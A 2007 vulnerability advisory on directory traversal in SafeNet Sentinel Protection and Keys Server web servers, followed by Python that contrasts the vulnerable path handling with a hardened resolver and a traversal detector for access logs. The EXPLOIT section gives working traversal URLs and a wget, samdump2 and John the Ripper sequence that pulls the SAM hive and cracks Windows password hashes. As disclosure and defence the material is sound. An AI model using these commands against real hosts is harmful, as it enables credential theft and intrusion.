
| Subject: | Directory Traversal in SafeNet Sentinel Protection Server and Keys Server |
|---|---|
| Date: | Mon, 26 Nov 2007 16:06:11 -0500 |
SUMMARY
=======

SafeNet Inc.'s Sentinel Protection Server and Sentinel Keys Server products include web servers which are vulnerable to directory traversal attacks. A remote attacker could exploit these vulnerabilities to read arbitrary files with the permissions of the web server, typically SYSTEM.

AFFECTED SOFTWARE
=================

* Sentinel Protection Server 7.0.0 through 7.4.0 and possibly below
* Sentinel Keys Server 1.0.3 and possibly below

UNAFFECTED
==========

* Sentinel Protection Server 7.4.1
* Sentinel Keys Server 1.0.4

IMPACT
======

A remote attacker could exploit this vulnerability to read sensitive files on the affected system. Attractive targets include the SAM registry hive, which contains system password hashes.

DETAILS
=======

Sentinel Protection Server and Sentinel Keys Server run web servers on ports 6002 and 7002, respectively, to allow remote monitoring of key use. The web server software does not sanitize request paths correctly before using them in system calls. As a result, an attacker can request files outside the web server's directory root by using the ../ notation to refer to the parent directory of the current directory.

SOLUTION
========

Upgrade to Sentinel Protection Server 7.4.1 and Sentinel Keys Server 1.0.4.

First upgrade the Sentinel Driver software to 7.4.0 if you are using an earlier version:

    http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0.zip

Then install "Security Patch to Sentinel Protection Installer 7.4.0":

    http://safenet-inc.com/support/files/SPI740SecurityPatch.zip

EXPLOIT
=======

Most popular web browsers are not able to display URLs exploiting this problem. I recommend using wget or lynx instead. Substitute port 7002 to target Keys Server instead of Protection Server.

This example will retrieve the C:\boot.ini file:

    http://XX.XX.XX.XX:6002/../../../../../../boot.ini

This example will retrieve a copy of the target system's SAM registry hive from the Windows repair folder:

    http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam

With the SAM and SYSTEM registry hives, it is possible to extract the system's local password hashes for offline cracking. For example, using the bkhive, samdump2, and John the Ripper tools:

    $ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam
    $ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/system
    $ bkhive system keyfile
    $ samdump2 sam keyfile > hashes
    $ john --wordlist=all hashes

    http://ophcrack.sourceforge.net/bkhive.php
    http://www.openwall.com/john/

ACKNOWLEDGMENTS
===============

Thanks to SafeNet for patching this vulnerability and for working with me on this advisory.

According to Digital Defense, Inc.'s advisory, Corey Lebleu originally discovered this problem on October 10th, 2007. I discovered the same vulnerability independently on October 29th, 2007. I have no reason to doubt Digital Defense, Inc.'s claim, and do not claim to have discovered the problem first.

REVISION HISTORY
================

2007-11-26 original release

--
Elliot Kendall <ekendall@brandeis.edu>
Network Security Architect
Brandeis University
Trouble replying? See http://people.brandeis.edu/~ekendall/sign/
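The DETAILS section above gives the root cause: request paths reach file-system calls without being normalized, so ../ segments walk out of the document root. The following Python is an added example, not code from SafeNet or from this advisory. It places the vulnerable string-concatenation pattern beside a hardened resolver that decodes, normalizes and bounds the path before any file API sees it, and then runs that resolver as a detector over a few constructed access-log lines. DOC_ROOT, the log lines and every function name here are assumptions for illustration; the traversal request paths are the ones quoted in the advisory.

```python
"""Request-path handling for a small file-serving HTTP daemon.

Added example, not code from SafeNet or from the advisory. DOC_ROOT and the
sample log lines are constructed for illustration.
"""
from urllib.parse import unquote

# Hypothetical document root of the monitoring web server (assumed, not SafeNet's).
DOC_ROOT = "C:/Program Files/Sentinel/www"


class TraversalError(ValueError):
    """Raised when a request path would escape the document root."""


def naive_resolve(doc_root, request_path):
    """The vulnerable pattern: the request path is appended to the root as-is.

    The operating system interprets every '..' segment later, so a request
    like /../../../../../../boot.ini walks up to the drive root.
    """
    return doc_root + request_path


def hardened_resolve(doc_root, request_path):
    """Decode, normalize and bound the path before it reaches any file API."""
    # Percent-decode until the string stops changing (catches %252e double
    # encoding), but bound the loop so a hostile client cannot make it spin.
    decoded = request_path
    for _ in range(3):
        once = unquote(decoded)
        if once == decoded:
            break
        decoded = once
    else:
        raise TraversalError("path still changing after repeated decoding")

    if "\x00" in decoded:
        raise TraversalError("NUL byte in path")

    # Windows file APIs accept both separators, so treat '\' as '/'.
    decoded = decoded.replace("\\", "/")

    # Walk the segments with a stack; '..' may never pop past the root.
    stack = []
    for segment in decoded.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if not stack:
                raise TraversalError("traversal outside document root: %r" % request_path)
            stack.pop()
            continue
        if ":" in segment:
            # 'C:' style segments would be read as drive-relative on Windows.
            raise TraversalError("drive specifier in path: %r" % request_path)
        stack.append(segment)

    return doc_root.rstrip("/") + "/" + "/".join(stack)


def is_safe(doc_root, request_path):
    """True when the hardened resolver accepts the path, False when it rejects it."""
    try:
        hardened_resolve(doc_root, request_path)
    except TraversalError:
        return False
    return True


# Constructed access-log lines in a generic 'client "request" status' shape
# (not real Sentinel log output). Two of them carry the advisory's traversal paths.
SAMPLE_LOG = """\
10.0.0.5 "GET /index.html HTTP/1.0" 200
10.0.0.9 "GET /../../../../../../boot.ini HTTP/1.0" 200
10.0.0.9 "GET /..%2f..%2f..%2fwinnt/repair/sam HTTP/1.0" 200
10.0.0.7 "GET /css/../index.html HTTP/1.0" 200
"""


def flag_traversal(log_text):
    """Return the request paths in the log that the hardened resolver rejects.

    Running the same check the server should have applied makes a cheap
    detector for historical logs from an unpatched 6002/7002 listener.
    """
    flagged = []
    for line in log_text.splitlines():
        request_path = line.split('"')[1].split(" ")[1]
        if not is_safe(DOC_ROOT, request_path):
            flagged.append(request_path)
    return flagged


if __name__ == "__main__":
    print("naive:   ", naive_resolve(DOC_ROOT, "/../../../../../../boot.ini"))
    print("hardened:", hardened_resolve(DOC_ROOT, "/css/../index.html"))
    print("flagged: ", flag_traversal(SAMPLE_LOG))
```

Two design points matter here. The stack walk rejects the request rather than silently clamping it at the root: a client that sends more `..` segments than the path has depth is never a legitimate one, and rejecting it keeps the attempt visible in the logs. Decoding is done before the walk, so an encoded `%2f` or `%2e` cannot sneak a separator or dot past the check, and the decode loop is bounded so that it cannot be turned into a denial of service.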